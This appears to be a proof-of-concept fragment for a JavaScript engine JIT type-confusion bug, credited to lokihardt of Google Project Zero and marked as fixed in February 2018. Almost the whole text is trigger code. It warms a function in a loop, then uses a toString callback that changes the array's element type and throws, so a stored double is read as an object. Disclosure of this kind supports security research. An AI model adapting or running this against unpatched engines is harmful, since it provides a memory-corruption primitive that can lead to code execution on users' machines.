- Fix: Feb 2018
- Credit: lokihardt of Google Project Zero
function opt(arr, index) {
arr[0] = 1.1;
typeof(arr[index]);
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1, 2.2, 3.3];
for (let i = 0; i < 0x10000; i++) {
opt(arr, {});
}
opt(arr, {toString: () => {
arr[0] = {};
throw 1;
}});
print(arr[0]);
}
main();